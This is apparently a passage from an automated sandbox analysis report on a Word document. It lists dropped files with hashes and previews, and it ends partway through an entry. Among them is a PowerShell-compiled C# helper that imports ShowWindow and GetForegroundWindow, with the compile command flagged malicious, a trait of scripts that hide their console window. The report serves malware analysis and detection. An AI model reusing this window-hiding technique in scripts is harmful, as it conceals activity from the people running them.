                                                                                      Preview:L.....-g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\p0kqociu\CSCE1A7387FE7C64A8A9613A1F038E91290.TMP...................^".....~L.F.oH..........5.......C:\Users\user\AppData\Local\Temp\RESAEBA.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.0.k.q.o.c.i.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51yaqg4h.uo5.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awnh0j2x.s3q.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1lrk4eo.4cy.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsrzde1d.let.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hdlyuatf.in0.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwyxuxue.o3a.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osv2zviw.gwp.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlen5wlu.zdt.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2oxxq3r.gtc.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wixw4cnj.v3e.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yokjdmx4.gbc.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsy0fj1a.zca.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Users\user\AppData\Local\Temp\p0kqociu\CSCE1A7387FE7C64A8A9613A1F038E91290.TMP

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                      File Type:MSVC .res
                                                                                      Category:dropped
                                                                                      Size (bytes):652
                                                                                      Entropy (8bit):3.0948480253567197
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryMaCak7Ynqq/aDPN5Dlq5J:+RI+ycuZhNzCakSCDPNnqX
                                                                                      MD5:1F5E22C6DD1FE49BEA7E4CFB46F66F48
                                                                                      SHA1:A1C985DD05AFD62FB21E6D1C1EFDCDCECEB5522E
                                                                                      SHA-256:83419FD23485BFD1CB7F015440AD4F41283A3E0A7E92FB9C20E0000F29F6F4E3
                                                                                      SHA-512:20A0037D37AF4C46E7437D51626283223EDC0C4C62F5E7390B47E4A4EF4F213907F66E41B068CD46920D33F17ADF30D4337F15142C07B57C2D5524377809BF6F
                                                                                      Malicious:false
                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.0.k.q.o.c.i.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.0.k.q.o.c.i.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                      C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.0.cs

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):244
                                                                                      Entropy (8bit):4.952945910145069
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:V/DssSuVY/so68SRvoSoODnso68SRaqK4Li:V/D9PY/REvoOnREfe
                                                                                      MD5:6E7BC02C23E28738F9898185137720DB
                                                                                      SHA1:F0450E92B0D01C2A0D23DEF93299FFD1512FAB46
                                                                                      SHA-256:80A682DC3D4FEF7A23471B441BBA682648D7373DEB9889E0017E3BBBA43754E7
                                                                                      SHA-512:FF24CEDAD3619B0D2379F668A06CE36A5DAFF2EBC2B11FCF8BD960C3272D99F5F77EDCA893701A6232DC9EB07794C8D2ABC3FD802CE7E5638EE87291DE1AAEFB
                                                                                      Malicious:false
                                                                                      Preview:.using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern int ShowWindow(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow(); }

                                                                                      C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.cmdline

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):371
                                                                                      Entropy (8bit):5.248071332194925
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2KJjq23flfBAzxs7+AEszIKJjq23flfB9n:p37Lvkmb6K9FQWZEYFNn
                                                                                      MD5:F3E227DADF7C540C22829B751CA15CC8
                                                                                      SHA1:23EBA5CAB8EFC59F26B717D8B1FA27584A86F23E
                                                                                      SHA-256:98BA2956E56264809DFEEF99F5F037FF181EEDC0A679D08F55A329C16ADE7B14
                                                                                      SHA-512:B2F93B0AC91C8B64559111623559E6576A5644C129D493A7DA6E4178AF9618F5AC6CB85CFAA4769CFF6839ED9D3903D7D60D4A2F987F83028FAD9ECAB36E2437
                                                                                      Malicious:true
                                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.0.cs"

                                                                                      C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):3072
                                                                                      Entropy (8bit):2.7897059467542715
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:etGStSEJ2JJi8R86QMBTyetkZfeZBsN3+WI+ycuZhNzCakSCDPNnqI:6gNR9ZyRJe8N3l1ulzCa3CpqI
                                                                                      MD5:C8317BD5582B854A3B148D576B39AD1D
                                                                                      SHA1:9FD73E8948E3FF5AC65B9B5F81D2BD2364380AEF
                                                                                      SHA-256:9B6BD47B02E732C285C045643D515709C3A0527ECE81EA0729BC2528784578EE
                                                                                      SHA-512:D0A485F772849FDC6CE8B03276DC49331FFB999D2487D5A04494EF0BE4AE90752566D931FBC1F9130EED9471FB1B9829D42734DD234E0A54F6DAD876DB2287A0
                                                                                      Malicious:false
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-g...........!.................#... ...@....... ....................................@.................................P#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&.....g.....g.......................................... 4............ ?.....P ......S.........Y.....^...S.....S...!.S.....S.......".....+.......4.......?..................................................<Module

                                                                                      C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.out

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):872
                                                                                      Entropy (8bit):5.319882245061709
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:KhId3ka6KnRE+IKax5DqBVKVrdFAMBJTH:ykka6CRE+IK2DcVKdBJj
                                                                                      MD5:D1329E1E59651A8E09EC5885D3805733
                                                                                      SHA1:36D2F1521358481D41902BA8596A2A93005F4E21
                                                                                      SHA-256:D7E261DCB3ACAF285E78D2FB2143688242B5300C14CC124F62380438C0E1DC3C
                                                                                      SHA-512:1A28ED9FC749CEF3AA0E3906280784A2BFFD76A7712273AC09192F78C3B6DB289EF312796A83069786CA7CE266A8EC664522A0B65E65EFF1B84F089DCA55851D
                                                                                      Malicious:false
                                                                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                      C:\Users\user\AppData\Local\Temp\~$out-Us.docx.docx

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.456031245028976
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:my/7llh9ltllflLXllKkbhqlmklX2Xn:HD59ltlDlAhT12X
                                                                                      MD5:6F318261AA821EAD5435D3921CE68869
                                                                                      SHA1:E8678B8DC2649FA1BCD674AC7DC0F9804314898E
                                                                                      SHA-256:63CAD4548BB23506EF3498EDE852714EBDE334B78AB2BA05DF75DDBD3795B10D
                                                                                      SHA-512:10BD7AD966F8EFD628FC0B89007E01361D85E4FDC341880CF24DD7F7E7EE018398B01E0A589A4902D270E6AF96E17DD794533171840F29D21ED2A659B3A734DA
                                                                                      Malicious:false
                                                                                      Preview:..........................................................%....h*.............X..mk.......%....5.......................5.......Z...1.....O..."(...1...........G..

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\MSO2057.acl

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):37740
                                                                                      Entropy (8bit):3.1246471244437695
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:vatNbFeZKdogeyHMOeYhIVi+iOFOqbPXdEmawb:e/eLAhIVJbf
                                                                                      MD5:C60D0A502A279A24FDA60A852BCE3C16
                                                                                      SHA1:B84D510672B80CBB92652977CF4E0D0D3BCBBA6C
                                                                                      SHA-256:19A0B290ECA7FD24DE6292D4AE3D86C8857D48CED2ECF4E0AAEB7F6BF34AACA2
                                                                                      SHA-512:9D9DD9E4A322FBCF7DBF80EDBC7548D2C04DAF87064A38903D246408029874DEC6EE2EC42A60C5FF2B219AA7EACE57EE3D578F4B832822A7D535A7D51FF04BAD
                                                                                      Malicious:false
                                                                                      Preview:........l.......S.....(.c.)...........(.e.)...... ....(.r.)...........(.t.m.)....."!..............& ....a.b.b.o.u.t.....a.b.o.u.t.....a.b.o.t.u.....a.b.o.u.t.....a.b.o.u.t.a.....a.b.o.u.t. .a.....a.b.o.u.t.i.t.....a.b.o.u.t. .i.t.....a.b.o.u.t.t.h.e.....a.b.o.u.t. .t.h.e.....a.b.s.c.e.n.c.e.....a.b.s.e.n.c.e.....a.c.c.e.s.o.r.i.e.s.....a.c.c.e.s.s.o.r.i.e.s.....a.c.c.i.d.a.n.t.....a.c.c.i.d.e.n.t.....a.c.c.o.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.c.o.r.d.i.n.g.t.o.....a.c.c.o.r.d.i.n.g. .t.o.....a.c.c.r.o.s.s.....a.c.r.o.s.s.....a.c.h.e.i.v.e.....a.c.h.i.e.v.e.....a.c.h.e.i.v.e.d.....a.c.h.i.e.v.e.d.....a.c.h.e.i.v.i.n.g.....a.c.h.i.e.v.i.n.g.....a.c.n.....c.a.n.....a.c.o.m.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.o.m.o.d.a.t.e.....a.c.c.o.m.m.o.d.a.t.e.....a.c.t.u.a.l.y.l.....a.c.t.u.a.l.l.y.....a.d.d.i.t.i.n.a.l.....a.d.d.i.t.i.o.n.a.l.....a.d.d.t.i.o.n.a.l.....a.d.d.i.t.i.o.n.a.l.....a.d.e.q.u.i.t.....a.d.e.q.u.a.t.e.....a.d.e.q.u.i.t.e.....a.d.e.q.u.a.t.e.....a.d.n.....

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):18
                                                                                      Entropy (8bit):2.836591668108979
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:QhRZln:Qb
                                                                                      MD5:C635A6BFA5AE32F7E77689DF0465FC21
                                                                                      SHA1:AFF2FB5D3D3DBB371C3EDAA867AA0FB4FD4D8B06
                                                                                      SHA-256:75EB61906ED4248E5CB1C7A09A2031E5C159A52577A5625766612370E508D535
                                                                                      SHA-512:A1BBCCBBD6B849070F3981710E1D1F0882C78C2947781908ACAF987FC2F3E34C8DB981212B47C9D714568E4F8D91D938056329787121EE9397D7086F8A57855A
                                                                                      Malicious:false
                                                                                      Preview:..D.y.l.a.n.e.....

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2
                                                                                      Entropy (8bit):1.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Qn:Qn
                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                      Malicious:false
                                                                                      Preview:..

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2HEIFWU51KHHQZ2LFWD8.temp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6222
                                                                                      Entropy (8bit):3.737279564276476
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:cAV8Z5qfCfLAe6skvhkvCCt2ula1dHI2ula1dHi:crFf7l8i7l8A
                                                                                      MD5:C3D6EB6AC6E0EB949957530DF538CBA6
                                                                                      SHA1:06E36C7A6AC0F7D8DD5178F5378D844A40511DBB
                                                                                      SHA-256:76AB2CBEF92B87817CE700E67542534FAA6B27FF648E2C64712A629C9CE4437F
                                                                                      SHA-512:8B92913198A325293C8FBCBCBBD197726E340487371E71EA2C181AB8B2A52403C190394F69B114F9BE74FDE1722BB0C8B633B74B0B54E91634D7790174B0258C
                                                                                      Malicious:false
                                                                                      Preview:...................................FL..................F.".. ......A.....a...1..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........A.....Z...1......1......t...CFSF..1.....&W.<..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......&W.<hY.M.............................A.p.p.D.a.t.a...B.V.1.....hY.M..Roaming.@......&W.<hY.M...........................9..R.o.a.m.i.n.g.....\.1.....+YS6..MICROS~1..D......&W.<hY.M...........................RN.M.i.c.r.o.s.o.f.t.....V.1.....hY....Windows.@......&W.<hY.M..............................W.i.n.d.o.w.s.......1.....&W.<..STARTM~1..n......&W.<hY.M....................D.......b.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....&W.<..Programs..j......&W.<hY.M....................@......+}.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......&W.<hY.M..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......&W.<hY.M....8...........

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6222
                                                                                      Entropy (8bit):3.7388595143722565
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:xqAV8Z5FDCfPAk6skvhkvCCt2ula1dHI2ula1dHi:xqr4Z7l8i7l8A
                                                                                      MD5:AE3A603CC022AE1A719D668563B6CB63
                                                                                      SHA1:5D3D898D8132F480CF76E420997EB15DA5828F08
